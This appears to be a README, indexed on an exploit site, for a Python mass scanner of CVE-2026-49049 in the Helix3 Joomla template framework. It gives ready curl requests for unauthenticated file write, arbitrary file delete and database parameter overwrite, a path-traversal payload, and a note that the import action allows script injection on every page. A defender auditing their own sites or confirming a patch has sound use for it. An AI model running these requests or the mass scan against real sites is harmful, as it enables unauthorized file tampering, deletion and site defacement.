Share
## https://sploitus.com/exploit?id=7AA8728A-DBBB-598B-8A88-CDFD3BBC34EE
CVE-2026-49049 โ€” Helix3 Joomla Plugin (JoomShaper)
Unauthenticated AJAX Handler โ€” Read-Only Vulnerability Scanner

---

## Overview

**CVE-2026-49049** affects the Helix3 template framework for Joomla (versions **1.0 through 3.1.0**). The `onAjaxHelix3` handler, reachable via Joomla's `com_ajax` dispatcher, performs **no authentication, authorization, or CSRF validation** on several destructive actions:

| Action | Impact | Available In |
|---|---|---|
| `save` | Writes attacker-controlled JSON files with **path traversal** | All versions |
| `remove` | Deletes arbitrary files โ€” **no extension or path restriction** | All versions |
| `import` | Overwrites stored template parameters in the database | **v3.x only** |

> **Note:** The `import` action was added in Helix3 v3.x. Sites running v2.x are only affected by `save` and `remove`.

The vulnerability was discovered by **Phil Taylor** (mySites.guru) and published June 29, 2026.

### Affected Versions

| Helix3 Version | save/remove | import |
|---|---|---|
| 1.0 โ€“ 2.x | Vulnerable | Not present |
| 3.0 โ€“ 3.1.0 | Vulnerable | Vulnerable |
| 3.1.1+ | Patched | Patched |

---

## Installation

```bash
git clone https://github.com/shinthink/CVE-2026-49049.git
cd CVE-2026-49049
pip install -r requirements.txt
```

---

## Usage

```bash
# Single target
python cve_2026_49049.py -t 192.168.1.100

# Mass scan
python cve_2026_49049.py -f targets.txt -o results.txt

# With JSON report + verbose
python cve_2026_49049.py -f targets.txt --json report.json -v
```

### Arguments

```
  -t, --target     Single target (domain or IP)
  -f, --file       File with targets, one per line
  -o, --output     Real-time text output (default: cve-2026-49049_scan.txt)
  --json           Structured JSON report (default: cve-2026-49049_report.json)
  --threads        Concurrent workers (default: 15)
  --timeout        HTTP timeout in seconds (default: 15)
  -v, --verbose    Show probe details
```

---

## Proof of Concept

### Detection & Validation

The scanner performs a **read-only probe** โ€” it writes a harmless JSON file to the Helix3 layout folder via the unauthenticated `save` endpoint, verifies it was written, then immediately deletes it via the `remove` endpoint. No persistent changes are left on the target.

```bash
$ python cve_2026_49049.py -t 192.168.1.100 -v
```

```
    CVE-2026-49049 โ€” Helix3 (JoomShaper)
    Joomla Unauthenticated AJAX Handler Scanner

    [*] save   โ€” accessible (probe: 3a9719da)
    [*] remove โ€” accessible (probe cleaned)

  Host      : 192.168.1.100
  Status    : vulnerable
  Helix3    : 2.5.6
  Vulnerable: YES
  save      : YES
  remove    : YES
  import    : NO
  Time      : 2.0s
```

### Manual Reproduction

The scanner probes these exact endpoints. For manual verification:

**Step 1 โ€” Confirm Helix3 is installed**

```bash
curl -sk 'https://target.com/templates/shaper_helix3/templateDetails.xml'
# Look for X.X.X
```

**Step 2 โ€” Test save action (unauthenticated file write)**

```bash
curl -sk -X POST \
  'https://target.com/index.php?option=com_ajax&plugin=helix3&format=json' \
  -d 'data[action]=save&data[layoutName]=_test_probe&data[content]={"probe":"test"}'
```

**Step 3 โ€” Test remove action (unauthenticated file delete)**

```bash
curl -sk -X POST \
  'https://target.com/index.php?option=com_ajax&plugin=helix3&format=json' \
  -d 'data[action]=remove&data[layoutName]=_test_probe.json'
```

**Step 4 โ€” Test import action (v3.x only, not available in v2.x)**

```bash
curl -sk -X POST \
  'https://target.com/index.php?option=com_ajax&plugin=helix3&format=json' \
  -d 'data[action]=import&data[template_id]=1&data[settings]={}'

# Note: import was added in Helix3 v3.x.
# Sites running v2.x will return an empty response for this action.
```

### Vulnerability Mechanism

In Helix3 versions before 3.1.1, `plugins/ajax/helix3/helix3.php` processes requests via `onAjaxHelix3()` with **no guards**:

```php
public function onAjaxHelix3()
{
    $input = Factory::getApplication()->input;
    $data  = $input->post->get('data', [], 'array');
    $action = $data['action'];
    $layoutName = $data['layoutName'];

    // No auth check. No CSRF token. No path validation.
    $filepath = $layoutPath . $layoutName;   // path traversal possible

    switch ($action) {
        case 'remove':
            unlink($filepath);               // arbitrary file delete
            break;
        case 'save':
            fwrite(fopen($filepath . '.json', 'wb'), $data['content']);  // write
            break;
    }
}
```

### What Makes This Dangerous

- **Save + path traversal** โ€” `layoutName=../../../somewhere/evil` writes files outside the intended layout directory
- **Remove has no extension restriction** โ€” unlike `save` (which appends `.json`), `remove` can target any file type
- **Import (v3.x) overwrites database params** โ€” `custom_js` is rendered **unescaped** in the template output, enabling script injection on every page. This is the vector used in real-world defacement attacks.

---

## Disclaimer

> **FOR EDUCATIONAL AND AUTHORIZED TESTING PURPOSES ONLY.**
>
> This software is intended for security professionals conducting authorized penetration tests, organizations auditing their own infrastructure, and researchers studying vulnerability exploitation.
>
> Unauthorized access to computer systems is illegal and may violate:
> - United States: Computer Fraud and Abuse Act (18 U.S.C. 1030)
> - Indonesia: UU ITE Pasal 30 & 46
> - European Union: Directive 2013/40/EU
> - United Kingdom: Computer Misuse Act 1990
>
> The authors assume no liability for misuse. By using this software, you accept full responsibility for your actions.

---

## References

| Resource | Link |
|---|---|
| Original Advisory (mySites.guru) | [Helix3 3.1.1 Security Fix](https://mysites.guru/blog/helix3-security-update-changelog-failure/) |
| NVD Entry | [CVE-2026-49049](https://nvd.nist.gov/vuln/detail/CVE-2026-49049) |
| OpenCVE | [CVE-2026-49049](https://app.opencve.io/cve/CVE-2026-49049) |
| JoomShaper GitHub | [Helix3 Repository](https://github.com/JoomShaper/Helix3) |

---


  This project is not affiliated with JoomShaper, Joomla, or Open Source Matters, Inc.